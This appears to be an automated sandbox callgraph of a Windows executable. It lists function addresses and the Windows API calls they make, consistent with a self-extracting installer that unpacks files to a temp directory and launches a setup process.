7ff7a8cc2e43 2368->2369 2370 7ff7a8cc509b 2368->2370 2369->2250 2369->2251 2370->2369 2371 7ff7a8cc50a4 FindResourceA LoadResource LockResource 2370->2371 2371->2369 2372 7ff7a8cc50e3 memcpy_s FreeResource 2371->2372 2372->2369 2374 7ff7a8cc7566 2373->2374 2384 7ff7a8cc70f2 2373->2384 2375 7ff7a8cc8470 7 API calls 2374->2375 2377 7ff7a8cc2fb1 2375->2377 2376 7ff7a8cc71ca 2376->2374 2379 7ff7a8cc71e7 GetModuleFileNameA 2376->2379 2377->2250 2377->2266 2378 7ff7a8cc711d CharNextA 2378->2384 2380 7ff7a8cc720f 2379->2380 2381 7ff7a8cc721c 2379->2381 2449 7ff7a8cc7d68 2380->2449 2381->2374 2383 7ff7a8cc76f1 2458 7ff7a8cc8648 RtlCaptureContext RtlLookupFunctionEntry 2383->2458 2384->2374 2384->2376 2384->2378 2384->2383 2387 7ff7a8cc7238 CharUpperA 2384->2387 2393 7ff7a8cc739d CharUpperA 2384->2393 2394 7ff7a8cc7346 CompareStringA 2384->2394 2395 7ff7a8cc73fb CharUpperA 2384->2395 2396 7ff7a8cc7492 CharUpperA 2384->2396 2397 7ff7a8cc72d0 CharUpperA 2384->2397 2398 7ff7a8cc7ce8 IsDBCSLeadByte CharNextA 2384->2398 2454 7ff7a8cc7ba8 2384->2454 2387->2384 2388 7ff7a8cc766f 2387->2388 2389 7ff7a8cc4dcc 24 API calls 2388->2389 2390 7ff7a8cc7692 2389->2390 2391 7ff7a8cc76aa ExitProcess 2390->2391 2392 7ff7a8cc769e CloseHandle 2390->2392 2392->2391 2393->2384 2394->2384 2395->2384 2396->2384 2397->2384 2398->2384 2401 7ff7a8cc2213 2400->2401 2404 7ff7a8cc2086 2400->2404 2402 7ff7a8cc8470 7 API calls 2401->2402 2403 7ff7a8cc2222 2402->2403 2403->2260 2405 7ff7a8cc20dc FindFirstFileA 2404->2405 2405->2401 2406 7ff7a8cc20fe 2405->2406 2407 7ff7a8cc21a3 2406->2407 2408 7ff7a8cc2138 lstrcmpA 2406->2408 2409 7ff7a8cc21d9 FindNextFileA 2406->2409 2413 7ff7a8cc7ba8 CharPrevA 2406->2413 2414 7ff7a8cc204c 8 API calls 2406->2414 2411 7ff7a8cc21b4 SetFileAttributesA DeleteFileA 2407->2411 2408->2409 2410 7ff7a8cc2158 lstrcmpA 2408->2410 2409->2406 2412 7ff7a8cc21f5 FindClose RemoveDirectoryA 2409->2412 2410->2406 2410->2409 2411->2409 2412->2401 2413->2406 2414->2406 2416 7ff7a8cc3c4f 2415->2416 2421 7ff7a8cc3c59 2415->2421 2417 7ff7a8cc4dcc 24 API calls 2416->2417 2418 7ff7a8cc3f05 2416->2418 2417->2418 2419 7ff7a8cc8470 7 API calls 2418->2419 2420 7ff7a8cc3042 2419->2420 2420->2260 2430 7ff7a8cc12ec 2420->2430 2421->2416 2421->2418 2423 7ff7a8cc3db1 2421->2423 2464 7ff7a8cc2834 2421->2464 2423->2416 2423->2418 2424 7ff7a8cc3eb7 MessageBeep 2423->2424 2425 7ff7a8cc7f04 13 API calls 2424->2425 2426 7ff7a8cc3eca 2425->2426 2427 7ff7a8cc3ed3 MessageBoxA 2426->2427 2428 7ff7a8cc7e34 2 API calls 2426->2428 2427->2418 2428->2427 2431 7ff7a8cc14b5 2430->2431 2432 7ff7a8cc133c 2430->2432 2434 7ff7a8cc8470 7 API calls 2431->2434 2496 7ff7a8cc11cc LoadLibraryA 2432->2496 2436 7ff7a8cc14da 2434->2436 2436->2260 2436->2288 2437 7ff7a8cc134d GetCurrentProcess OpenProcessToken 2437->2431 2438 7ff7a8cc1377 GetTokenInformation 2437->2438 2439 7ff7a8cc14a0 CloseHandle 2438->2439 2440 7ff7a8cc13a0 GetLastError 2438->2440 2439->2431 2440->2439 2441 7ff7a8cc13b5 LocalAlloc 2440->2441 2441->2439 2442 7ff7a8cc13d2 GetTokenInformation 2441->2442 2443 7ff7a8cc1491 LocalFree 2442->2443 2444 7ff7a8cc13fc AllocateAndInitializeSid 2442->2444 2443->2439 2444->2443 2447 7ff7a8cc1445 2444->2447 2445 7ff7a8cc1481 FreeSid 2445->2443 2446 7ff7a8cc1452 EqualSid 2446->2447 2448 7ff7a8cc1476 2446->2448 2447->2445 2447->2446 2447->2448 2448->2445 2450 7ff7a8cc7dd9 2449->2450 2451 7ff7a8cc7d88 2449->2451 2450->2381 2452 7ff7a8cc7d90 IsDBCSLeadByte 2451->2452 2453 7ff7a8cc7db6 CharNextA 2451->2453 2452->2451 2453->2450 2453->2451 2455 7ff7a8cc7bc8 2454->2455 2455->2455 2456 7ff7a8cc7bec CharPrevA 2455->2456 2457 7ff7a8cc7bda 2455->2457 2456->2457 2457->2384 2459 7ff7a8cc8685 RtlVirtualUnwind 2458->2459 2460 7ff7a8cc86c7 2458->2460 2459->2460 2463 7ff7a8cc8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2460->2463 2465 7ff7a8cc2a2f 2464->2465 2475 7ff7a8cc2872 2464->2475 2466 7ff7a8cc2a41 GlobalFree 2465->2466 2467 7ff7a8cc2a50 2465->2467 2466->2467 2467->2423 2469 7ff7a8cc28a5 GetFileVersionInfoSizeA 2470 7ff7a8cc28c2 GlobalAlloc 2469->2470 2469->2475 2470->2465 2471 7ff7a8cc28e1 GlobalLock 2470->2471 2471->2465 2472 7ff7a8cc28fc GetFileVersionInfoA 2471->2472 2473 7ff7a8cc2920 VerQueryValueA 2472->2473 2472->2475 2474 7ff7a8cc29ed GlobalUnlock 2473->2474 2473->2475 2474->2475 2475->2465 2475->2469 2475->2474 2476 7ff7a8cc29d9 GlobalUnlock 2475->2476 2477 7ff7a8cc261c 2475->2477 2476->2465 2478 7ff7a8cc27e0 GetSystemDirectoryA 2477->2478 2479 7ff7a8cc265b CharUpperA CharNextA CharNextA 2477->2479 2480 7ff7a8cc27f1 2478->2480 2481 7ff7a8cc27dd 2479->2481 2482 7ff7a8cc269c 2479->2482 2483 7ff7a8cc2805 2480->2483 2486 7ff7a8cc7ba8 CharPrevA 2480->2486 2481->2478 2484 7ff7a8cc27c7 GetWindowsDirectoryA 2482->2484 2485 7ff7a8cc26a6 2482->2485 2487 7ff7a8cc8470 7 API calls 2483->2487 2484->2480 2489 7ff7a8cc7ba8 CharPrevA 2485->2489 2486->2483 2488 7ff7a8cc2814 2487->2488 2488->2475 2490 7ff7a8cc2705 RegOpenKeyExA 2489->2490 2490->2480 2491 7ff7a8cc2738 RegQueryValueExA 2490->2491 2492 7ff7a8cc27b4 RegCloseKey 2491->2492 2493 7ff7a8cc276b 2491->2493 2492->2480 2494 7ff7a8cc2774 ExpandEnvironmentStringsA 2493->2494 2495 7ff7a8cc2792 2493->2495 2494->2495 2495->2492 2497 7ff7a8cc1221 GetProcAddress 2496->2497 2498 7ff7a8cc12bb 2496->2498 2500 7ff7a8cc123f AllocateAndInitializeSid 2497->2500 2501 7ff7a8cc12ac FreeLibrary 2497->2501 2499 7ff7a8cc8470 7 API calls 2498->2499 2502 7ff7a8cc12ca 2499->2502 2500->2501 2503 7ff7a8cc1288 FreeSid 2500->2503 2501->2498 2502->2431 2502->2437 2503->2501 2506 7ff7a8cc5050 7 API calls 2505->2506 2507 7ff7a8cc60bf LocalAlloc 2506->2507 2508 7ff7a8cc60dd 2507->2508 2509 7ff7a8cc610b 2507->2509 2510 7ff7a8cc4dcc 24 API calls 2508->2510 2511 7ff7a8cc5050 7 API calls 2509->2511 2512 7ff7a8cc60fb 2510->2512 2513 7ff7a8cc611d 2511->2513 2718 7ff7a8cc7700 GetLastError 2512->2718 2514 7ff7a8cc6121 2513->2514 2515 7ff7a8cc615a lstrcmpA 2513->2515 2517 7ff7a8cc4dcc 24 API calls 2514->2517 2518 7ff7a8cc6174 LocalFree 2515->2518 2519 7ff7a8cc618a 2515->2519 2520 7ff7a8cc613f LocalFree 2517->2520 2523 7ff7a8cc3123 2518->2523 2521 7ff7a8cc4dcc 24 API calls 2519->2521 2520->2523 2522 7ff7a8cc61ac LocalFree 2521->2522 2522->2523 2523->2291 2523->2293 2523->2299 2525 7ff7a8cc5050 7 API calls 2524->2525 2526 7ff7a8cc6001 2525->2526 2527 7ff7a8cc6006 2526->2527 2528 7ff7a8cc604a 2526->2528 2530 7ff7a8cc4dcc 24 API calls 2527->2530 2529 7ff7a8cc5050 7 API calls 2528->2529 2531 7ff7a8cc6063 2529->2531 2534 7ff7a8cc3146 2530->2534 2532 7ff7a8cc772c 13 API calls 2531->2532 2533 7ff7a8cc606f 2532->2533 2533->2534 2535 7ff7a8cc4dcc 24 API calls 2533->2535 2534->2299 2536 7ff7a8cc66c4 2534->2536 2535->2534 2537 7ff7a8cc5050 7 API calls 2536->2537 2538 7ff7a8cc6706 LocalAlloc 2537->2538 2539 7ff7a8cc6756 2538->2539 2540 7ff7a8cc6726 2538->2540 2542 7ff7a8cc5050 7 API calls 2539->2542 2541 7ff7a8cc4dcc 24 API calls 2540->2541 2544 7ff7a8cc6744 2541->2544 2543 7ff7a8cc6768 2542->2543 2545 7ff7a8cc67a5 lstrcmpA LocalFree 2543->2545 2546 7ff7a8cc676c 2543->2546 2743 7ff7a8cc7700 GetLastError 2544->2743 2551 7ff7a8cc6837 2545->2551 2553 7ff7a8cc67ec 2545->2553 2548 7ff7a8cc4dcc 24 API calls 2546->2548 2549 7ff7a8cc678a LocalFree 2548->2549 2554 7ff7a8cc6749 2549->2554 2550 7ff7a8cc6b14 2555 7ff7a8cc7ac8 28 API calls 2550->2555 2551->2550 2552 7ff7a8cc684f GetTempPathA 2551->2552 2556 7ff7a8cc6872 2552->2556 2564 7ff7a8cc68a5 2552->2564 2558 7ff7a8cc64e4 53 API calls 2553->2558 2557 7ff7a8cc8470 7 API calls 2554->2557 2555->2554 2719 7ff7a8cc64e4 2556->2719 2560 7ff7a8cc3153 2557->2560 2561 7ff7a8cc680c 2558->2561 2560->2299 2560->2304 2561->2554 2563 7ff7a8cc4dcc 24 API calls 2561->2563 2563->2554 2564->2554 2565 7ff7a8cc68f9 GetDriveTypeA 2564->2565 2566 7ff7a8cc6adb GetWindowsDirectoryA 2564->2566 2568 7ff7a8cc6916 GetFileAttributesA 2565->2568 2581 7ff7a8cc6911 2565->2581 2570 7ff7a8cc6ca4 38 API calls 2566->2570 2568->2581 2570->2564 2571 7ff7a8cc64e4 53 API calls 2571->2564 2572 7ff7a8cc6ca4 38 API calls 2572->2581 2573 7ff7a8cc6955 GetDiskFreeSpaceA 2575 7ff7a8cc6983 MulDiv 2573->2575 2573->2581 2574 7ff7a8cc2468 25 API calls 2574->2581 2575->2581 2576 7ff7a8cc6a02 GetWindowsDirectoryA 2576->2581 2577 7ff7a8cc7ba8 CharPrevA 2578 7ff7a8cc6a2a GetFileAttributesA 2577->2578 2579 7ff7a8cc6a40 CreateDirectoryA 2578->2579 2578->2581 2579->2581 2580 7ff7a8cc6a6d SetFileAttributesA 2580->2581 2581->2554 2581->2565 2581->2566 2581->2568 2581->2572 2581->2573 2581->2574 2581->2576 2581->2577 2581->2580 2582 7ff7a8cc64e4 53 API calls 2581->2582 2582->2581 2584 7ff7a8cc6d12 2583->2584 2585 7ff7a8cc6d3f GetDiskFreeSpaceA 2583->2585 2586 7ff7a8cc4dcc 24 API calls 2584->2586 2587 7ff7a8cc6d80 MulDiv 2585->2587 2588 7ff7a8cc6f63 memset 2585->2588 2589 7ff7a8cc6d2f 2586->2589 2587->2588 2591 7ff7a8cc6dae GetVolumeInformationA 2587->2591 2794 7ff7a8cc7700 GetLastError 2588->2794 2775 7ff7a8cc7700 GetLastError 2589->2775 2594 7ff7a8cc6de6 memset 2591->2594 2595 7ff7a8cc6e45 SetCurrentDirectoryA 2591->2595 2593 7ff7a8cc6f7b GetLastError FormatMessageA 2597 7ff7a8cc6fbd 2593->2597 2776 7ff7a8cc7700 GetLastError 2594->2776 2599 7ff7a8cc6e6c 2595->2599 2600 7ff7a8cc4dcc 24 API calls 2597->2600 2598 7ff7a8cc6dfe GetLastError FormatMessageA 2598->2597 2604 7ff7a8cc6eb4 2599->2604 2607 7ff7a8cc6ed8 2599->2607 2601 7ff7a8cc6fd8 SetCurrentDirectoryA 2600->2601 2606 7ff7a8cc6d34 2601->2606 2602 7ff7a8cc8470 7 API calls 2603 7ff7a8cc326f 2602->2603 2603->2299 2603->2311 2605 7ff7a8cc4dcc 24 API calls 2604->2605 2605->2606 2606->2602 2607->2606 2777 7ff7a8cc24f8 2607->2777 2610 7ff7a8cc5050 7 API calls 2609->2610 2611 7ff7a8cc5dab FindResourceA LoadResource LockResource 2610->2611 2612 7ff7a8cc5dfc 2611->2612 2626 7ff7a8cc5fcf 2611->2626 2613 7ff7a8cc5e56 2612->2613 2614 7ff7a8cc5e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2612->2614 2795 7ff7a8cc5c60 #20 2613->2795 2614->2613 2617 7ff7a8cc5e5f 2620 7ff7a8cc4dcc 24 API calls 2617->2620 2618 7ff7a8cc5e69 #20 2618->2617 2619 7ff7a8cc5ed1 #22 2618->2619 2621 7ff7a8cc5f15 #23 2619->2621 2622 7ff7a8cc5f53 2619->2622 2620->2622 2621->2617 2621->2622 2623 7ff7a8cc5f61 FreeResource 2622->2623 2624 7ff7a8cc5f75 2622->2624 2623->2624 2625 7ff7a8cc5f9f 2624->2625 2627 7ff7a8cc4dcc 24 API calls 2624->2627 2625->2626 2628 7ff7a8cc5fb1 SendMessageA 2625->2628 2626->2331 2627->2625 2628->2626 2630 7ff7a8cc4118 2629->2630 2642 7ff7a8cc412f 2629->2642 2631 7ff7a8cc5050 7 API calls 2630->2631 2631->2642 2632 7ff7a8cc4145 memset 2632->2642 2633 7ff7a8cc4254 2634 7ff7a8cc4dcc 24 API calls 2633->2634 2640 7ff7a8cc4273 2634->2640 2636 7ff7a8cc8470 7 API calls 2637 7ff7a8cc44ff 2636->2637 2637->2325 2638 7ff7a8cc42f5 CompareStringA 2639 7ff7a8cc45d8 2638->2639 2638->2642 2639->2640 2644 7ff7a8cc45f2 RegOpenKeyExA 2639->2644 2640->2636 2641 7ff7a8cc44df LocalFree 2641->2640 2642->2632 2642->2633 2642->2638 2642->2639 2642->2640 2642->2641 2643 7ff7a8cc5050 7 API calls 2642->2643 2645 7ff7a8cc4599 2642->2645 2653 7ff7a8cc44ad LocalFree 2642->2653 2656 7ff7a8cc41fd CompareStringA 2642->2656 2672 7ff7a8cc4394 2642->2672 2807 7ff7a8cc1684 2642->2807 2846 7ff7a8cc1d28 memset memset RegCreateKeyExA 2642->2846 2873 7ff7a8cc473c CreateProcessA 2642->2873 2643->2642 2644->2640 2648 7ff7a8cc4627 RegQueryValueExA 2644->2648 2647 7ff7a8cc4dcc 24 API calls 2645->2647 2649 7ff7a8cc45b8 LocalFree 2647->2649 2651 7ff7a8cc471c RegCloseKey 2648->2651 2652 7ff7a8cc466c memset GetSystemDirectoryA 2648->2652 2649->2640 2651->2640 2654 7ff7a8cc46b3 2652->2654 2655 7ff7a8cc469d 2652->2655 2653->2639 2653->2642 2659 7ff7a8cc114c _vsnprintf 2654->2659 2658 7ff7a8cc7ba8 CharPrevA 2655->2658 2656->2642 2658->2654 2660 7ff7a8cc46dc RegSetValueExA 2659->2660 2660->2651 2661 7ff7a8cc43a5 GetProcAddress 2663 7ff7a8cc4521 2661->2663 2661->2672 2662 7ff7a8cc4574 2664 7ff7a8cc4dcc 24 API calls 2662->2664 2667 7ff7a8cc4dcc 24 API calls 2663->2667 2666 7ff7a8cc4597 2664->2666 2668 7ff7a8cc4553 LocalFree 2666->2668 2669 7ff7a8cc4544 FreeLibrary 2667->2669 2898 7ff7a8cc7700 GetLastError 2668->2898 2669->2668 2671 7ff7a8cc4569 2671->2640 2672->2661 2672->2662 2673 7ff7a8cc4480 FreeLibrary 2672->2673 2674 7ff7a8cc44d3 FreeLibrary 2672->2674 2888 7ff7a8cc79f0 2672->2888 2673->2653 2674->2641 2676 7ff7a8cc5050 7 API calls 2675->2676 2677 7ff7a8cc3f8b LocalAlloc 2676->2677 2678 7ff7a8cc3fdd 2677->2678 2679 7ff7a8cc3fad 2677->2679 2681 7ff7a8cc5050 7 API calls 2678->2681 2680 7ff7a8cc4dcc 24 API calls 2679->2680 2682 7ff7a8cc3fcb 2680->2682 2683 7ff7a8cc3fef 2681->2683 2935 7ff7a8cc7700 GetLastError 2682->2935 2685 7ff7a8cc4030 lstrcmpA 2683->2685 2686 7ff7a8cc3ff3 2683->2686 2688 7ff7a8cc4098 LocalFree 2685->2688 2689 7ff7a8cc404e 2685->2689 2687 7ff7a8cc4dcc 24 API calls 2686->2687 2690 7ff7a8cc4011 LocalFree 2687->2690 2692 7ff7a8cc3139 2688->2692 2691 7ff7a8cc7ac8 28 API calls 2689->2691 2690->2692 2693 7ff7a8cc406e LocalFree 2691->2693 2692->2291 2692->2299 2693->2692 2694->2299 2702 7ff7a8cc778a 2695->2702 2696 7ff7a8cc114c _vsnprintf 2697 7ff7a8cc77df FindResourceA 2696->2697 2698 7ff7a8cc7801 2697->2698 2699 7ff7a8cc775e LoadResource LockResource 2697->2699 2700 7ff7a8cc8470 7 API calls 2698->2700 2699->2698 2699->2702 2701 7ff7a8cc782e 2700->2701 2701->2315 2702->2696 2703 7ff7a8cc7803 FreeResource 2702->2703 2704 7ff7a8cc77b8 FreeResource 2702->2704 2703->2698 2704->2702 2706 7ff7a8cc5050 7 API calls 2705->2706 2707 7ff7a8cc4967 LocalAlloc 2706->2707 2708 7ff7a8cc49a9 2707->2708 2709 7ff7a8cc4989 2707->2709 2711 7ff7a8cc5050 7 API calls 2708->2711 2710 7ff7a8cc4dcc 24 API calls 2709->2710 2713 7ff7a8cc49a7 2710->2713 2712 7ff7a8cc49bb 2711->2712 2714 7ff7a8cc49bf 2712->2714 2715 7ff7a8cc49d5 lstrcmpA 2712->2715 2713->2299 2717 7ff7a8cc4dcc 24 API calls 2714->2717 2715->2714 2716 7ff7a8cc4a0e LocalFree 2715->2716 2716->2713 2717->2716 2718->2523 2720 7ff7a8cc6516 2719->2720 2723 7ff7a8cc65dd 2719->2723 2750 7ff7a8cc63b8 2720->2750 2722 7ff7a8cc6688 2726 7ff7a8cc8470 7 API calls 2722->2726 2761 7ff7a8cc6b70 2723->2761 2730 7ff7a8cc66a8 2726->2730 2728 7ff7a8cc6577 GetSystemInfo 2741 7ff7a8cc6591 2728->2741 2729 7ff7a8cc65cc 2733 7ff7a8cc7ba8 CharPrevA 2729->2733 2730->2554 2744 7ff7a8cc2468 GetWindowsDirectoryA 2730->2744 2731 7ff7a8cc662a CreateDirectoryA 2734 7ff7a8cc663f 2731->2734 2735 7ff7a8cc667d 2731->2735 2732 7ff7a8cc6649 2732->2722 2737 7ff7a8cc6ca4 38 API calls 2732->2737 2733->2723 2734->2732 2773 7ff7a8cc7700 GetLastError 2735->2773 2740 7ff7a8cc665a 2737->2740 2738 7ff7a8cc6682 2738->2722 2739 7ff7a8cc7ba8 CharPrevA 2739->2729 2740->2722 2742 7ff7a8cc6666 RemoveDirectoryA 2740->2742 2741->2729 2741->2739 2742->2722 2743->2554 2745 7ff7a8cc24a6 2744->2745 2746 7ff7a8cc24c4 2744->2746 2747 7ff7a8cc4dcc 24 API calls 2745->2747 2748 7ff7a8cc8470 7 API calls 2746->2748 2747->2746 2749 7ff7a8cc24df 2748->2749 2749->2564 2749->2571 2752 7ff7a8cc63e3 2750->2752 2751 7ff7a8cc114c _vsnprintf 2751->2752 2752->2751 2753 7ff7a8cc7ba8 CharPrevA 2752->2753 2756 7ff7a8cc644b GetTempFileNameA 2752->2756 2754 7ff7a8cc6420 RemoveDirectoryA GetFileAttributesA 2753->2754 2754->2752 2755 7ff7a8cc64b6 CreateDirectoryA 2754->2755 2755->2756 2757 7ff7a8cc6490 2755->2757 2756->2757 2758 7ff7a8cc646b DeleteFileA CreateDirectoryA 2756->2758 2759 7ff7a8cc8470 7 API calls 2757->2759 2758->2757 2760 7ff7a8cc64a2 2759->2760 2760->2722 2760->2728 2760->2729 2762 7ff7a8cc6b8b 2761->2762 2762->2762 2763 7ff7a8cc6b94 LocalAlloc 2762->2763 2764 7ff7a8cc6bf5 2763->2764 2765 7ff7a8cc6bb4 2763->2765 2768 7ff7a8cc7ba8 CharPrevA 2764->2768 2766 7ff7a8cc4dcc 24 API calls 2765->2766 2772 7ff7a8cc6bd2 2766->2772 2769 7ff7a8cc6c14 CreateFileA LocalFree 2768->2769 2771 7ff7a8cc6c61 CloseHandle GetFileAttributesA 2769->2771 2769->2772 2770 7ff7a8cc6626 2770->2731 2770->2732 2771->2772 2772->2770 2774 7ff7a8cc7700 GetLastError 2772->2774 2773->2738 2774->2770 2775->2606 2776->2598 2778 7ff7a8cc2562 2777->2778 2779 7ff7a8cc2525 2777->2779 2780 7ff7a8cc2567 2778->2780 2781 7ff7a8cc25ab 2778->2781 2782 7ff7a8cc114c _vsnprintf 2779->2782 2783 7ff7a8cc114c _vsnprintf 2780->2783 2784 7ff7a8cc255d 2781->2784 2787 7ff7a8cc114c _vsnprintf 2781->2787 2785 7ff7a8cc253d 2782->2785 2786 7ff7a8cc257f 2783->2786 2788 7ff7a8cc8470 7 API calls 2784->2788 2789 7ff7a8cc4dcc 24 API calls 2785->2789 2790 7ff7a8cc4dcc 24 API calls 2786->2790 2791 7ff7a8cc25c7 2787->2791 2792 7ff7a8cc2609 2788->2792 2789->2784 2790->2784 2793 7ff7a8cc4dcc 24 API calls 2791->2793 2792->2606 2793->2784 2794->2593 2796 7ff7a8cc5ced 2795->2796 2806 7ff7a8cc5d62 2795->2806 2797 7ff7a8cc5380 29 API calls 2796->2797 2799 7ff7a8cc5d04 2797->2799 2798 7ff7a8cc8470 7 API calls 2800 7ff7a8cc5d78 2798->2800 2801 7ff7a8cc5d0d #21 2799->2801 2799->2806 2800->2617 2800->2618 2802 7ff7a8cc5d28 2801->2802 2801->2806 2803 7ff7a8cc5770 CloseHandle 2802->2803 2802->2806 2804 7ff7a8cc5d4a 2803->2804 2805 7ff7a8cc5d4f #23 2804->2805 2804->2806 2805->2806 2806->2798 2808 7ff7a8cc16d3 2807->2808 2899 7ff7a8cc15e8 2808->2899 2811 7ff7a8cc7ba8 CharPrevA 2813 7ff7a8cc1766 2811->2813 2812 7ff7a8cc7d68 2 API calls 2814 7ff7a8cc1811 2812->2814 2813->2812 2815 7ff7a8cc181a CompareStringA 2814->2815 2816 7ff7a8cc1a1b 2814->2816 2815->2816 2818 7ff7a8cc184d GetFileAttributesA 2815->2818 2817 7ff7a8cc7d68 2 API calls 2816->2817 2819 7ff7a8cc1a28 2817->2819 2820 7ff7a8cc19f3 2818->2820 2821 7ff7a8cc1867 2818->2821 2822 7ff7a8cc1a31 CompareStringA 2819->2822 2823 7ff7a8cc1acb LocalAlloc 2819->2823 2824 7ff7a8cc1a00 2820->2824 2821->2820 2827 7ff7a8cc15e8 2 API calls 2821->2827 2822->2823 2834 7ff7a8cc1a60 2822->2834 2823->2824 2825 7ff7a8cc1aeb GetFileAttributesA 2823->2825 2826 7ff7a8cc4dcc 24 API calls 2824->2826 2842 7ff7a8cc1b01 2825->2842 2828 7ff7a8cc1a14 2826->2828 2829 7ff7a8cc188b 2827->2829 2833 7ff7a8cc8470 7 API calls 2828->2833 2830 7ff7a8cc18b5 LocalAlloc 2829->2830 2831 7ff7a8cc15e8 2 API calls 2829->2831 2830->2824 2832 7ff7a8cc18d7 GetPrivateProfileIntA GetPrivateProfileStringA 2830->2832 2831->2830 2835 7ff7a8cc1984 2832->2835 2845 7ff7a8cc194f 2832->2845 2836 7ff7a8cc1be9 2833->2836 2834->2834 2837 7ff7a8cc1a81 LocalAlloc 2834->2837 2839 7ff7a8cc1995 GetShortPathNameA 2835->2839 2840 7ff7a8cc19ba 2835->2840 2836->2642 2837->2824 2841 7ff7a8cc1ab2 2837->2841 2839->2840 2844 7ff7a8cc114c _vsnprintf 2840->2844 2843 7ff7a8cc114c _vsnprintf 2841->2843 2907 7ff7a8cc2a6c 2842->2907 2843->2845 2844->2845 2845->2828 2847 7ff7a8cc2019 2846->2847 2848 7ff7a8cc1dce 2846->2848 2849 7ff7a8cc8470 7 API calls 2847->2849 2851 7ff7a8cc114c _vsnprintf 2848->2851 2853 7ff7a8cc1e25 2848->2853 2850 7ff7a8cc2028 2849->2850 2850->2642 2852 7ff7a8cc1dee RegQueryValueExA 2851->2852 2852->2848 2852->2853 2854 7ff7a8cc1e46 GetSystemDirectoryA 2853->2854 2855 7ff7a8cc1e29 RegCloseKey 2853->2855 2856 7ff7a8cc7ba8 CharPrevA 2854->2856 2855->2847 2857 7ff7a8cc1e6a LoadLibraryA 2856->2857 2858 7ff7a8cc1e86 GetProcAddress FreeLibrary 2857->2858 2859 7ff7a8cc1f55 GetModuleFileNameA 2857->2859 2858->2859 2860 7ff7a8cc1ebe GetSystemDirectoryA 2858->2860 2861 7ff7a8cc1f78 RegCloseKey 2859->2861 2864 7ff7a8cc1ee8 2859->2864 2862 7ff7a8cc1ed5 2860->2862 2860->2864 2861->2847 2863 7ff7a8cc7ba8 CharPrevA 2862->2863 2863->2864 2864->2864 2865 7ff7a8cc1f11 LocalAlloc 2864->2865 2866 7ff7a8cc1f35 2865->2866 2867 7ff7a8cc1f8e 2865->2867 2868 7ff7a8cc4dcc 24 API calls 2866->2868 2869 7ff7a8cc114c _vsnprintf 2867->2869 2870 7ff7a8cc1f53 2868->2870 2871 7ff7a8cc1fc4 2869->2871 2870->2861 2871->2871 2872 7ff7a8cc1fcd RegSetValueExA RegCloseKey LocalFree 2871->2872 2872->2847 2874 7ff7a8cc47c2 WaitForSingleObject GetExitCodeProcess 2873->2874 2875 7ff7a8cc48b3 2873->2875 2880 7ff7a8cc47f9 2874->2880 2934 7ff7a8cc7700 GetLastError 2875->2934 2877 7ff7a8cc48b8 GetLastError FormatMessageA 2878 7ff7a8cc4dcc 24 API calls 2877->2878 2882 7ff7a8cc491c 2878->2882 2883 7ff7a8cc2318 18 API calls 2880->2883 2887 7ff7a8cc482a CloseHandle CloseHandle 2880->2887 2881 7ff7a8cc48aa 2881->2882 2884 7ff7a8cc8470 7 API calls 2882->2884 2885 7ff7a8cc484d 2883->2885 2886 7ff7a8cc492f 2884->2886 2885->2887 2886->2642 2887->2881 2887->2882 2889 7ff7a8cc7a25 2888->2889 2890 7ff7a8cc7ba8 CharPrevA 2889->2890 2891 7ff7a8cc7a63 GetFileAttributesA 2890->2891 2892 7ff7a8cc7a96 LoadLibraryA 2891->2892 2893 7ff7a8cc7a79 2891->2893 2895 7ff7a8cc7aa9 2892->2895 2893->2892 2894 7ff7a8cc7a7d LoadLibraryExA 2893->2894 2894->2895 2896 7ff7a8cc8470 7 API calls 2895->2896 2897 7ff7a8cc7ab9 2896->2897 2897->2672 2898->2671 2900 7ff7a8cc1609 2899->2900 2902 7ff7a8cc1621 2900->2902 2904 7ff7a8cc1651 2900->2904 2920 7ff7a8cc7ce8 2900->2920 2903 7ff7a8cc7ce8 2 API calls 2902->2903 2905 7ff7a8cc162f 2903->2905 2904->2811 2904->2813 2905->2904 2906 7ff7a8cc7ce8 2 API calls 2905->2906 2906->2905 2908 7ff7a8cc2aa0 GetModuleFileNameA 2907->2908 2909 7ff7a8cc2c24 2907->2909 2908->2909 2919 7ff7a8cc2ac8 2908->2919 2910 7ff7a8cc8470 7 API calls 2909->2910 2911 7ff7a8cc2c37 2910->2911 2911->2828 2912 7ff7a8cc2acc IsDBCSLeadByte 2912->2919 2913 7ff7a8cc2af1 CharNextA CharUpperA 2915 7ff7a8cc2b9b CharUpperA 2913->2915 2913->2919 2914 7ff7a8cc2bf6 CharNextA 2916 7ff7a8cc2c08 CharNextA 2914->2916 2915->2919 2916->2909 2916->2912 2918 7ff7a8cc2b36 CharPrevA 2918->2919 2919->2912 2919->2913 2919->2914 2919->2916 2919->2918 2925 7ff7a8cc7c40 2919->2925 2923 7ff7a8cc7d00 2920->2923 2921 7ff7a8cc7d47 2921->2900 2922 7ff7a8cc7d0a IsDBCSLeadByte 2922->2921 2922->2923 2923->2921 2923->2922 2924 7ff7a8cc7d30 CharNextA 2923->2924 2924->2923 2926 7ff7a8cc7c58 2925->2926 2926->2926 2927 7ff7a8cc7c61 CharPrevA 2926->2927 2928 7ff7a8cc7c7d CharPrevA 2927->2928 2929 7ff7a8cc7c75 2928->2929 2930 7ff7a8cc7c94 2928->2930 2929->2928 2929->2930 2931 7ff7a8cc7cc7 2930->2931 2932 7ff7a8cc7cb5 CharNextA 2930->2932 2933 7ff7a8cc7c9e CharPrevA 2930->2933 2931->2919 2932->2931 2933->2931 2933->2932 2934->2877 2935->2692 2937 7ff7a8cc2281 2936->2937 2938 7ff7a8cc22eb 2936->2938 2939 7ff7a8cc7ba8 CharPrevA 2937->2939 2940 7ff7a8cc8470 7 API calls 2938->2940 2941 7ff7a8cc2294 WritePrivateProfileStringA _lopen 2939->2941 2942 7ff7a8cc22fd 2940->2942 2941->2938 2943 7ff7a8cc22c7 _llseek _lclose 2941->2943 2942->2355 2943->2938 3091 7ff7a8cc8417 3092 7ff7a8cc8426 _exit 3091->3092 3093 7ff7a8cc842f 3091->3093 3092->3093 3094 7ff7a8cc8444 3093->3094 3095 7ff7a8cc8438 _cexit 3093->3095 3095->3094

Callgraph

Hide Legend
  • Executed
  • Not Executed
  • Opacity -> Relevance
  • Disassembly available
